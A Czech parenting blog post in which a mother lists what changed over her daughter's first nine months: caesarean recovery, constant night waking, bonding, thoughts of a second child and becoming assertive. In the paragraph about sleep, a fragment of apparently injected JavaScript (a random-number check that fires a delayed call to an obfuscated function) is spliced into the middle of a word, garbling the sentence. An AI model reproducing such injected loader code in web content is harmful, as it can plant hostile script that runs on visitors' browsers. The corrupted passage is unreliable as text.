9 měsíců matkou

Google+ Pinterest LinkedIn Tumblr +

Taky jsem si to mohla nechat, až bude mít Alenka rok… Jenže 9 měsíců je tak pěkně symbolických. 9 měsíců jsem ji nosila v břiše (tak dobře, 8 a půl, nebuďte detailisté) a pak jsem se stala matkou. A co dál?

  • 9 měsíců trvalo mému tělu, než se z porodu zotavilo. Vážně jo. Obdivuju ženy, které pár hodin po porodu odejdou z porodního sálu po svých. A ženy, které mají pár měsíců po porodu císařem jen decentní šrám na břiše a zpátky své tělo. Já mám hodně, hodně horového smailíka o velkosti 22 cm, který se tak všelijak šklebí, a pořád slušnou diastázu břicha. Nicméně za to si můžu sama. Manžel mi dobře radil: Neflákej to! A já tu tlakovou masáž stejně nedělala a ty cviky stejně necvičila… Polepším se, vážně!
  • 9 měsíců mi trvalo, než jsem se naučila nespat. Alenka je v tomto směru spíš tyran než něžné miminko. Budí se v pravidelných 50minutových intervalech s pláčem, který se k jejím jemným rysům ABSOLUTNĚ NEHODÍ. A já trpím pořád stejně, protože vstávat, jakmile začnete znovu upadat do spánku, to je prostě o nervy. Nicméně tělo si, řekla bych, na tenhle pohotovostní stav navyklo. Už nemívám kruhy pod očima jako pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anda, a dokonce jsem schopná vést smysluplný rozhovor déle než 5 minut. Jo, mami, máš pravdu: ŽENY VYDRŽÍ VŠECHNO.
  • 9 měsíců nám trvalo, než jsme se s Alenkou sžily. Jakože na 100 % sžily. Žádné vnitřní boje, její ani moje. Já jí toleruju, že se ještě nenaučila rozlišovat den a noc (ano, JE TO NAŠE CHYBA, a ne, NENECHÁME JI VYPLAKAT), ona mi toleruje, že si občas dám pivo, přestože kojím (třeba jí chutná, že jo), a že jsem ji přestala nosit v šátku, protože se v zimě pod vrstvami všech těch košilek a triček potím už tak dost. Prostě se známe. Mrkneme na sebe a je nám to jasné… 🙂
  • 9 měsíců mi trvalo, než jsem začala uvažovat o dalším dítěti. Ne, nejsem těhotná, a ne, „nepokoušíme se o další“. A i kdyby nakrásně ano, asi nejsem až tak velký extrovert, abych o tom psala články :)). Jisté ale je, že mi navzdory tomu strašnému vyčerpání (já vím, že se opakuju, ale lidi drahý, já vyčerpaná vážně, vážně jsem!) těhotenství schází. To očekávání. A druhé těhotenství musí být super, protože jeden takový živůtek už běhá kolem vás, zatímco druhý nosíte v sobě. Vícenásobné matky mají být právem nač pyšné!
  • 9 měsíců mi trvalo, než jsem zase začala říkat NE. Ne práci, které bylo moc, ne lidem, kteří mě vnitřně vysávají,… Teď ještě naučit se s elegancí, leč důrazně říkat NE nezdravému jídlu a budu v podstatě dokonale asertivní žena.

A 9 měsíců Alenky? No, řekla bych: „Zeptejte se jí“, ale nejsem si jistá, co by vám odpověděla. Pravděpodobně by nakrčila nosík (jako její táta), šla vám dát francouzáka na nos (to nevím, po kom má) a na všechny vaše otázky s razatntním miminkovským akcentem odpovídala: NE NE NE.

A možná by vám taky mohla prozradit, kdy to tak vidí na ten první zub… 🙂

Sdílet.

O autorovi

Zanechte odpověď